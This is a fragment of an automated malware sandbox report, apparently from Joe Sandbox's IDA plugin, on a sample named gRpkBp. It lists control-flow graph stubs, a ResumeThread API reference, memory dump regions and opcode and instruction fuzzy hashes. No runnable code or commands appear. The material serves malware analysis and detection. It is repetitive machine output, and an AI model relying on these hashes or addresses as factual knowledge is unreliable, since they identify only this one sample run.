                                                control_flow_graph 549 25dd98-25de34 ResumeThread 552 25de36-25de3c 549->552 553 25de3d-25de7f 549->553 552->553
                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 0025DE1E
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427633647.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_250000_gRpkBp.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 558 25dda0-25de34 ResumeThread 561 25de36-25de3c 558->561 562 25de3d-25de7f 558->562 561->562
                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 0025DE1E
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427633647.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_250000_gRpkBp.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: e0e7a65f9bba50c44a3872b91096ad3bf11d4d72d2e4ffad55d027c22403a233
                                                • Instruction ID: 34db04ab341d7392c3eb5b8c37bcc97a58ce25642d2602c1ef3cef8831bfa8ea
                                                • Opcode Fuzzy Hash: e0e7a65f9bba50c44a3872b91096ad3bf11d4d72d2e4ffad55d027c22403a233
                                                • Instruction Fuzzy Hash: 2531BCB4D102189FCF10CFA9E985AAEFBB5AF49314F14942AE815B7300C735A945CF98
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427815159.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_590000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a9cb5177fe5b13a7e25da29b3b00c7d5a113b3597cca56b86c0bfa2df47acab6
                                                • Instruction ID: 2f781ddca80b7582080205aac56f63dc68bc61d62b1602a420e89a0e7b4a6b00
                                                • Opcode Fuzzy Hash: a9cb5177fe5b13a7e25da29b3b00c7d5a113b3597cca56b86c0bfa2df47acab6
                                                • Instruction Fuzzy Hash: FA41E6B8A05259CFCF04DFA8D5909ADFBB5FF4D304F24A955E419A7286C730A841CBA0
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427815159.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_590000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4167fd27cc877484240d0a13c5c7d12bf3bc31bd46fb795a38f5f0dc79ebd856
                                                • Instruction ID: aa2c4ecce6a0306920d7a7d2969d77392c0e9be7b2d7271cba8e1c8035464038
                                                • Opcode Fuzzy Hash: 4167fd27cc877484240d0a13c5c7d12bf3bc31bd46fb795a38f5f0dc79ebd856
                                                • Instruction Fuzzy Hash: 2141A1B8A05259CFCB44DFA9D5949ADFFB2FF48304F24A959E819A7246C730A841CB50
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427589064.000000000020D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0020D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_20d000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a7415f959f2207d3e8fe1d170a4f9daa3fb49a8cff32d6124f2148eb50140fe9
                                                • Instruction ID: c9e556b25799056552f122b4e1096346ead389ec815d331bcdec8588690fb661
                                                • Opcode Fuzzy Hash: a7415f959f2207d3e8fe1d170a4f9daa3fb49a8cff32d6124f2148eb50140fe9
                                                • Instruction Fuzzy Hash: F621F2B5625340EFDB01CF94D9C0B26BBA1FB84314F24C5A9EC494B287C376D866CB61
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427589064.000000000020D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0020D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_20d000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c8ab75ddd04dfceca6ce20f7c5ebd51376ab3eb057a513b223b7ad1f11316134
                                                • Instruction ID: db842458e867606461db0e1d4a97861f36bc254c47f63b86c6d839507a1d46c4
                                                • Opcode Fuzzy Hash: c8ab75ddd04dfceca6ce20f7c5ebd51376ab3eb057a513b223b7ad1f11316134
                                                • Instruction Fuzzy Hash: 2C2100B5614340EFDB11CF64D8C0B26BB62EB84314F20C569E84D4B287C376D81BCBA1
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427815159.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_590000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7cead8869390632af6ffab88089e0c8a76fd3ff7a8328aef14081ad9e551b7ee
                                                • Instruction ID: cb7e623804dd8fb0002e2f4229f311ae23be501545e3b0f2cacf758205514a35
                                                • Opcode Fuzzy Hash: 7cead8869390632af6ffab88089e0c8a76fd3ff7a8328aef14081ad9e551b7ee
                                                • Instruction Fuzzy Hash: 7A310774D4522ADFDB24DF64C840BECBBB5BB48300F1041EAD50AA7284DB309A85DF40
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427815159.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_590000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 198f432658f4a20b4ada3f304cf1051272a46f7a8b179afa2d0af1f7369f0561
                                                • Instruction ID: 74d0db28e6ab030549e25bf53e26f635bfc2bbdf7b045f3e5599ec7097e9e53a
                                                • Opcode Fuzzy Hash: 198f432658f4a20b4ada3f304cf1051272a46f7a8b179afa2d0af1f7369f0561
                                                • Instruction Fuzzy Hash: 5631C274E013089FDF15EFA4C854AAEBBB2FB89301F208159D80A6B399DB315D42CF90
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427815159.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_590000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8cfcafbfbe90f94559ae0b434982a5642cc911b4622af106f5e7654619fa73c0
                                                • Instruction ID: 271ed2ef4e37b9eb70f1a265f5e07d2ed66b126339678cdcac0010ec93263e67
                                                • Opcode Fuzzy Hash: 8cfcafbfbe90f94559ae0b434982a5642cc911b4622af106f5e7654619fa73c0
                                                • Instruction Fuzzy Hash: 0A31F378904629CFCF64CF64C954BE8BBB5BB49311F1085EAC40EA7291D7309AC5CF54
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427815159.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_590000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7390f163a7beca459959b015798909e4c7bf85df83ab76c1d70d07014e08b446
                                                • Instruction ID: 4444858f2ecb9e4dd62daee07230a4bf0d7c75ea848e82b9f2032f061d9b9d2a
                                                • Opcode Fuzzy Hash: 7390f163a7beca459959b015798909e4c7bf85df83ab76c1d70d07014e08b446
                                                • Instruction Fuzzy Hash: 4F112970D04208DFCF08DFAAD8846AEBBF6BF88300F10982AE805B7351DB7048018B51
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427589064.000000000020D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0020D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_20d000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                • Instruction ID: 9758770a954de70f820226f0585bba39ff9fde5e3c17b4f2f65df7db2e1cf611
                                                • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                • Instruction Fuzzy Hash: 9E118B75504380DFDB12CF54D9C4B15BBA2EB84314F28C6AAD8494B696C33AD85ACBA2
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427589064.000000000020D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0020D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_20d000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                • Instruction ID: 4a66b3a79bb19385eb1398b66d24a9eb98db44f2167a3c995b115566c15370f2
                                                • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                • Instruction Fuzzy Hash: 8B11A975905280DFDB02CF54C5C4B15BBA1FB84314F28C6A9DC494B697C33AD85ACBA1
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427815159.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_590000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1af67262ddaf74a3ca115409183087e53f65ec05206eddc734a882d7158f6da1
                                                • Instruction ID: d5ef56c5bcc2276192e8f1333dd3d7dac8a97229a850343a1f00b32c6a283cdf
                                                • Opcode Fuzzy Hash: 1af67262ddaf74a3ca115409183087e53f65ec05206eddc734a882d7158f6da1
                                                • Instruction Fuzzy Hash: 43111334908668DFCF65CF64CC846EEBFB9BB4A301F2080DAD409A7256D7315A8ADF40
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427815159.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_590000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e871d43e50150d404074fdc393bd1cfd0216dac6a3b548b86b3ba4c33125597d
                                                • Instruction ID: e5571c37b80bd660cb5b00e6f036482cd9b7234a1429d3695d9e1c227f0f7019
                                                • Opcode Fuzzy Hash: e871d43e50150d404074fdc393bd1cfd0216dac6a3b548b86b3ba4c33125597d
                                                • Instruction Fuzzy Hash: 27111C74E05229DFEB24DF64CC44BECBBB5BB48301F1080D5E54AA7284D7706A86CF04
                                                Memory Dump Source
                                                • Source File: 00000016.00000002.427815159.0000000000590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_22_2_590000_gRpkBp.jbxd
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663079109.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_200000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: N
                                                • API String ID: 0-1130791706
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663079109.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_200000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2046e8196d03e93107829e5a64cba01586cc9576cf3d75e9013ec301f0e1ee29
                                                • Instruction ID: cf1d22989d2e044a872a0d4f07362bef05f401466d3a203f4b00bf670de7e31d
                                                • Opcode Fuzzy Hash: 2046e8196d03e93107829e5a64cba01586cc9576cf3d75e9013ec301f0e1ee29
                                                • Instruction Fuzzy Hash: 0A72D374E15229CFDB64DF69C884BDDBBB2BB89300F1485EAD409A7255DB30AE81CF50
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663079109.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_200000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ffd12ad2ce064ddd6cf2249be2712dd512eab3ef010ea782a616e7737c3d303e
                                                • Instruction ID: 5dddfcdbc191192af1b9b0141837d96a43b1f44029b31f67c01afbc49f89bdff
                                                • Opcode Fuzzy Hash: ffd12ad2ce064ddd6cf2249be2712dd512eab3ef010ea782a616e7737c3d303e
                                                • Instruction Fuzzy Hash: B552AE74E01229CFDB64DF69D884B9DBBB2BF89300F1085EAD409A7255DB31AE91CF50
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663079109.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_200000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 69bba2a9ea13a3417a38cd5f37d9a94ca6e7c627ba08e68653c4986c75f62190
                                                • Instruction ID: 3b6ea4ec4af128220ad0f0be9aa28a1759a208b66eb04b35ee8ccaf0532507cf
                                                • Opcode Fuzzy Hash: 69bba2a9ea13a3417a38cd5f37d9a94ca6e7c627ba08e68653c4986c75f62190
                                                • Instruction Fuzzy Hash: 94F1F674E10218CFDB18DFA8D884B9DFBB2BF88304F5585A9D808AB395DB709985CF50
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663536758.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_a90000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 95359915f10367ddee9866e664ae745034dc12fc53db6e22f24fa40fa2f79d58
                                                • Instruction ID: 1648907cc136ca67201a057c241eed182ce0ab92cfcec418cb9a3dc4aa4ab4fd
                                                • Opcode Fuzzy Hash: 95359915f10367ddee9866e664ae745034dc12fc53db6e22f24fa40fa2f79d58
                                                • Instruction Fuzzy Hash: ABD18074E00218CFDB64DFA5D994B9DBBB2BF89300F2081A9D819AB255DB359E81CF50
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663536758.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_a90000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e5fcd146611a10726c1201eb9a899e76c931e04b3af4027f14e2940335409ebe
                                                • Instruction ID: e9378ba77d12c7d3d3160143d812149800531aaacbcd36d8ef397d24a172705d
                                                • Opcode Fuzzy Hash: e5fcd146611a10726c1201eb9a899e76c931e04b3af4027f14e2940335409ebe
                                                • Instruction Fuzzy Hash: 0ED17074E002188FDB64DFA5D994BADBBB2FF89300F2481A9D809A7255DB359E81CF50
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663079109.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_200000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a52745ad8581640c951cf9095471b39e5595cbc25ab1e3c31437b9de830b5aa
                                                • Instruction ID: 4ca8cb6fdcbe8fd6b14f466c326ab1c303bd4144ded958dcbcb1bc562d6ef25d
                                                • Opcode Fuzzy Hash: 4a52745ad8581640c951cf9095471b39e5595cbc25ab1e3c31437b9de830b5aa
                                                • Instruction Fuzzy Hash: D3D1C274E00218CFDB19DFA5D954BADBBB2BF89300F2480A9D809A7396DB355E85CF10
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663536758.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_a90000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: be17c57e9d0b6d85e6732157e2ea2e6d2748e51de06bf115570a4cac585f5553
                                                • Instruction ID: 8e425f90fd6ef0778e126c16d3cfc8b569a3aae467f3e825783b4d012c1d31a6
                                                • Opcode Fuzzy Hash: be17c57e9d0b6d85e6732157e2ea2e6d2748e51de06bf115570a4cac585f5553
                                                • Instruction Fuzzy Hash: 1CD19E74E002188FDB64DFA5C994B9DBBB2FF89300F2481A9D809AB359DB355E81CF50
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663079109.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_200000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: debe7b791b57e396d70c346f17573568641029e85daf9fdef64ba5440bc0d48c
                                                • Instruction ID: 72d81902274e10841e3dbb9496cda93696c9cafc7458ed8e68327184125c66e8
                                                • Opcode Fuzzy Hash: debe7b791b57e396d70c346f17573568641029e85daf9fdef64ba5440bc0d48c
                                                • Instruction Fuzzy Hash: 6AC1E7B5D052598FEB24CF6AD984BDDBBB2BF89300F14C0EAD448AB255DB314A85CF11
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663079109.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_200000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2dea0933f098b3335f1b8603f248d297d98e477086e6e1c916f6c4365970d352
                                                • Instruction ID: 28311db4bac6ca7b680494fce3c9aea0d32423ca971b0f802bee56ecb4b2d4ec
                                                • Opcode Fuzzy Hash: 2dea0933f098b3335f1b8603f248d297d98e477086e6e1c916f6c4365970d352
                                                • Instruction Fuzzy Hash: 9CA11470D10219CFDB14DFA8C988BDDBBB1BF89304F208669D409A72A2DB759984CF55
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663079109.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_200000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c65163a07e80757dbfab23b07813c3a4e3a3e8a1932c89865a28c30314ce9693
                                                • Instruction ID: 266d08733dab46d6abcf71478bc10a343f03fe71509a516ef8562bc4f59edeee
                                                • Opcode Fuzzy Hash: c65163a07e80757dbfab23b07813c3a4e3a3e8a1932c89865a28c30314ce9693
                                                • Instruction Fuzzy Hash: FB91F570D10319CFDB14DFA8C988BDDBBB1BF89314F208269D409A7292DB759985CF15
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663079109.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_200000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dd4838d1e813f2a919c817182a14939e3e19a3871dfae942e1a9b5e4ba348f79
                                                • Instruction ID: 01f8d9cb029b57ceda2fe8923e26485b0e6061458884f926aa6b10edb9f0ee62
                                                • Opcode Fuzzy Hash: dd4838d1e813f2a919c817182a14939e3e19a3871dfae942e1a9b5e4ba348f79
                                                • Instruction Fuzzy Hash: 9D81B670E016198FEB28CF66D944B9EFBF2AF89300F14C1EAD448A7255DB705A85CF11
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663079109.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_200000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 46501eb6bd22ed467f8ef5fd1092c7d6b41372869c968911c5d71c224ed6f8c0
                                                • Instruction ID: 53ae114d998d0df51367d065cee757a6dd94f7041c78f0910e9cacfe442ba41f
                                                • Opcode Fuzzy Hash: 46501eb6bd22ed467f8ef5fd1092c7d6b41372869c968911c5d71c224ed6f8c0
                                                • Instruction Fuzzy Hash: 6C51B674E10718DFDB18DFAAD894A9DBBB2BF89300F249129E815AB369DB305D41CF50
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663536758.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_a90000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dfdcb18c6d34a384711ee2bf008855fbe4dc6a8c647e3efc3e3767077b44814a
                                                • Instruction ID: 4c8fab4a2177fddd2381ffbf89e83b6ef3fbeb0258a5140b34a7f168635f55e8
                                                • Opcode Fuzzy Hash: dfdcb18c6d34a384711ee2bf008855fbe4dc6a8c647e3efc3e3767077b44814a
                                                • Instruction Fuzzy Hash: 115147B1D042888FDB15CFBAD85839DBFB2BF8A304F2881AEC414AB256DB354945CF51
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663536758.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_a90000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e0ee8a4087b5f26551abb3d6855a1c3e788c66f08054684763ba3dcac1139504
                                                • Instruction ID: 9949c5c67e51b1b909b335476a2d89bcdcbb2f0bf1621212d8a28c46336dee00
                                                • Opcode Fuzzy Hash: e0ee8a4087b5f26551abb3d6855a1c3e788c66f08054684763ba3dcac1139504
                                                • Instruction Fuzzy Hash: 82516A75E042488FDB19CFBAD85839DBBF2BF8A304F2484AEC414AB255EB394945CF51
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663536758.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_a90000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4ff2fd0175439b9a995b136c7ddaba395bf220a066732bbb1f301b33c24bf5ee
                                                • Instruction ID: a9d86f3e09d04c03eadf42d93c20ffe3368f581076b354bb26ca744a1824f5c9
                                                • Opcode Fuzzy Hash: 4ff2fd0175439b9a995b136c7ddaba395bf220a066732bbb1f301b33c24bf5ee
                                                • Instruction Fuzzy Hash: A9513975E042588FEB18CFBAD95839DBBF2BF8A304F2480AEC414AB255EB354945CF51
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663536758.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_a90000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cb31e1b8c0c8c98a49f32c4e69547e22c94f7c792739c02aea9c86665a2dee8c
                                                • Instruction ID: e9053461a94bd2455e537600f49954ff86112018c0d297b4bd7a172d0858a972
                                                • Opcode Fuzzy Hash: cb31e1b8c0c8c98a49f32c4e69547e22c94f7c792739c02aea9c86665a2dee8c
                                                • Instruction Fuzzy Hash: 5341C470E002198FDB18DFAAD95479EBBF2AF88300F24C12AD419BB255DB345946CF54
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663638618.0000000002270000.00000040.00000800.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2270000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: K
                                                • API String ID: 0-856455061
                                                • Opcode ID: 576412b48e7c749bfee7f136f5b17aceb87de2330bd19fa94f0880e5cbf607dd
                                                • Instruction ID: e1582014453cd26ac569764ab22cfae9b0b48d00b1b5f371c9291c02895a87a2
                                                • Opcode Fuzzy Hash: 576412b48e7c749bfee7f136f5b17aceb87de2330bd19fa94f0880e5cbf607dd
                                                • Instruction Fuzzy Hash: A333F430C1471A8ADB11EFA8C884A9DF7B1FF99300F55C69AD44C67225EB70AAD5CF81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663079109.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_200000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LRp
                                                • API String ID: 0-3405495957
                                                • Opcode ID: d8fd4714d3174f0e25ac434b862a7667194e6a26d6d1a9cdc69755f3b8c7d3b9
                                                • Instruction ID: 67d78fa7f9458f6a349ac55ba54ac16eb1f298ae4a1459cadfb2ab28d7cba9df
                                                • Opcode Fuzzy Hash: d8fd4714d3174f0e25ac434b862a7667194e6a26d6d1a9cdc69755f3b8c7d3b9
                                                • Instruction Fuzzy Hash: 8652E978900319CFCB55EF24E999A8DBBB2FF4A311F4085A5D50AA7368DB30AD85CF44
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663079109.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_200000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LRp
                                                • API String ID: 0-3405495957
                                                • Opcode ID: 945c4bb9215ce019c4e2d33f5e1b6920147fa036f5b162e2d071e8428d86399a
                                                • Instruction ID: ccf742a1df14cf575bf2a742664d3f67ee735563c48a2009532d313650245b04
                                                • Opcode Fuzzy Hash: 945c4bb9215ce019c4e2d33f5e1b6920147fa036f5b162e2d071e8428d86399a
                                                • Instruction Fuzzy Hash: 5152E978900319CFCB54EF24E999A9DBBB2FF4A311F4085A5D50AA7368DB30AD85CF44
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663638618.0000000002270000.00000040.00000800.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_2270000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: K
                                                • API String ID: 0-856455061
                                                • Opcode ID: 25198bbaf8b8dbb40123fba78428f89b6155c3909d5354c536d42c037931912f
                                                • Instruction ID: 9fc77cacc7bb1615aaa8bf06c3686e3d778b1930cafd19bb51f8095cb59447e3
                                                • Opcode Fuzzy Hash: 25198bbaf8b8dbb40123fba78428f89b6155c3909d5354c536d42c037931912f
                                                • Instruction Fuzzy Hash: 4AB14671C187198FDB15DFA9C8847DDBBB1EF89300F14C29AD408AB265EB74AA85CF41
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663648968.00000000022A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_22a0000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4efe74684c4795ff39bac4116e2879f9362b90e7a6880aaa4868925edf1b3670
                                                • Instruction ID: aaaea7509ae8129c4ab03df5c86a5391bb2b5452d4c39f623d2c80dc2178f6f7
                                                • Opcode Fuzzy Hash: 4efe74684c4795ff39bac4116e2879f9362b90e7a6880aaa4868925edf1b3670
                                                • Instruction Fuzzy Hash: EC826D74E012688FDB64DF69DD98BDDBBB2AF89300F1481EA940DA7265DB315E81CF40
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.663079109.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_29_2_200000_gRpkBp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 512eb644d3e310961e2ccecf94e79b487413965224e871aa1f71672925f97173
                                                • Instruction ID: e8d191791f37dca5338f7f2bd14725dfac995d6a68e492ba4699e5acaf2cf54e
